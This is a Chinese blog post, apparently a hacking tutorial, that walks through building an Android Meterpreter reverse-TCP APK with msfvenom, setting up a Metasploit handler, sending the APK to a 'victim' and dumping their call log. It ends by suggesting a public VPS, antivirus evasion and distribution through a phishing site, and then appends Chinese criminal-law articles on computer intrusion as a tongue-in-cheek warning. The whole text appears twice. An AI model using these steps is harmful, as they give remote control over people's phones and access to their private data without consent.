入侵安卓

首先,当然是打开我们快乐的linux

打开命令栏

得到root最高权限(如果已经是的请跳过)

sudo su

然后输入密码

得到root权限后输入如下命令(图片与上一张雷同)

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kaliip LPORT=5555 R > /root/apk.apk  

注:kaliip 改为本机IP(不会查询请看下图)      

       /root/apk.apk改为你自己的目录 建议为/home/你的用户名/ .apk


如果你成功的完成了如上的操作后文件夹中会自动生成一个apk文件


下一步输入

msfconsole

接着依次输入以下三个命令

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

show options

到这里我们前期的工作就已经完成了一半,接下来我们要具体配置下

set LHOST 你前文的IP

set LPORT 上文定义的端口,不强制要求只需与之前对应即可

输入exploit 即可开始监听

我要做的就只是将之前生成的apk文件发送给受害者即可,待对方点击软件是kali会自动上线,你只需输入指令即可控制手机

这里我们测试下获取受害者的手机通话记录dump_calllog,系统会自动生成一个txt文件,查看即可

由于我们的apk没有做免杀处理且测试机使用了安全软件所以手机上线一段时间后就会自动掉线

温馨提示,如果想知道更多控制指令可以输入help查看

写在文末:本次测试在内网环境下进行,所以只能够控制内网下的手机。并且没有做免杀处理,最终测试的效果也不太理想。

大家可以在一个有公网IP的vps上运行,并且进行免杀处理,最后发布至钓鱼网站即可。


附:

《中华人民共和国刑法》关于非法入侵公民计算机的量刑标准

所以说使用kali是危险的,不要做到从Linux入门到入狱,谢谢



第二百八十五条 非法侵入计算机信息系统罪
违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。 提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。 单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照各该款的规定处罚。
第二百八十六条 破坏计算机信息系统罪
违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。 违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。 单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照第一款的规定处罚。
第二百八十六条之一 拒不履行信息网络安全管理义务罪
网络服务提供者不履行法律、行政法规规定的信息网络安全管理义务,经监管部门责令采取改正措施而拒不改正,有下列情形之一的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金: (一)致使违法信息大量传播的; (二)致使用户信息泄露,造成严重后果的; (三)致使刑事案件证据灭失,情节严重的; (四)有其他严重情节的。 单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照前款的规定处罚。 有前两款行为,同时构成其他犯罪的,依照处罚较重的规定定罪处罚。
第二百八十七条 利用计算机实施犯罪的提示性规定
利用计算机实施金融诈骗、盗窃、贪污、挪用公款、窃取国家秘密或者其他犯罪的,依照本法有关规定定罪处罚。
第二百八十七条之一 非法利用信息网络罪
利用信息网络实施下列行为之一,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金: (一)设立用于实施诈骗、传授犯罪方法、制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组的; (二)发布有关制作或者销售毒品、枪支、淫秽物品等违禁物品、管制物品或者其他违法犯罪信息的; (三)为实施诈骗等违法犯罪活动发布信息的。 单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照第一款的规定处罚。 有前两款行为,同时构成其他犯罪的,依照处罚较重的规定定罪处罚。

本博客所有文章如无特别注明均为原创。作者:一土博客复制或转载请以超链接形式注明转自 一土博客
原文地址《入侵安卓
扫码手机阅读入侵安卓

首先,当然是打开我们快乐的linux

打开命令栏

得到root最高权限(如果已经是的请跳过)

sudo su

然后输入密码

得到root权限后输入如下命令(图片与上一张雷同)

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kaliip LPORT=5555 R > /root/apk.apk  

注:kaliip 改为本机IP(不会查询请看下图)      

       /root/apk.apk改为你自己的目录 建议为/home/你的用户名/ .apk


如果你成功的完成了如上的操作后文件夹中会自动生成一个apk文件


下一步输入

msfconsole

接着依次输入以下三个命令

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

show options

到这里我们前期的工作就已经完成了一半,接下来我们要具体配置下

set LHOST 你前文的IP

set LPORT 上文定义的端口,不强制要求只需与之前对应即可

输入exploit 即可开始监听

我要做的就只是将之前生成的apk文件发送给受害者即可,待对方点击软件是kali会自动上线,你只需输入指令即可控制手机

这里我们测试下获取受害者的手机通话记录dump_calllog,系统会自动生成一个txt文件,查看即可

由于我们的apk没有做免杀处理且测试机使用了安全软件所以手机上线一段时间后就会自动掉线

温馨提示,如果想知道更多控制指令可以输入help查看

写在文末:本次测试在内网环境下进行,所以只能够控制内网下的手机。并且没有做免杀处理,最终测试的效果也不太理想。

大家可以在一个有公网IP的vps上运行,并且进行免杀处理,最后发布至钓鱼网站即可。


附:

《中华人民共和国刑法》关于非法入侵公民计算机的量刑标准

所以说使用kali是危险的,不要做到从Linux入门到入狱,谢谢



第二百八十五条 非法侵入计算机信息系统罪
违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。 提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。 单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照各该款的规定处罚。
第二百八十六条 破坏计算机信息系统罪
违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。 违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。 单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照第一款的规定处罚。
第二百八十六条之一 拒不履行信息网络安全管理义务罪
网络服务提供者不履行法律、行政法规规定的信息网络安全管理义务,经监管部门责令采取改正措施而拒不改正,有下列情形之一的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金: (一)致使违法信息大量传播的; (二)致使用户信息泄露,造成严重后果的; (三)致使刑事案件证据灭失,情节严重的; (四)有其他严重情节的。 单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照前款的规定处罚。 有前两款行为,同时构成其他犯罪的,依照处罚较重的规定定罪处罚。
第二百八十七条 利用计算机实施犯罪的提示性规定
利用计算机实施金融诈骗、盗窃、贪污、挪用公款、窃取国家秘密或者其他犯罪的,依照本法有关规定定罪处罚。
第二百八十七条之一 非法利用信息网络罪
利用信息网络实施下列行为之一,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金: (一)设立用于实施诈骗、传授犯罪方法、制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组的; (二)发布有关制作或者销售毒品、枪支、淫秽物品等违禁物品、管制物品或者其他违法犯罪信息的; (三)为实施诈骗等违法犯罪活动发布信息的。 单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照第一款的规定处罚。 有前两款行为,同时构成其他犯罪的,依照处罚较重的规定定罪处罚。

相关推荐

分享

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)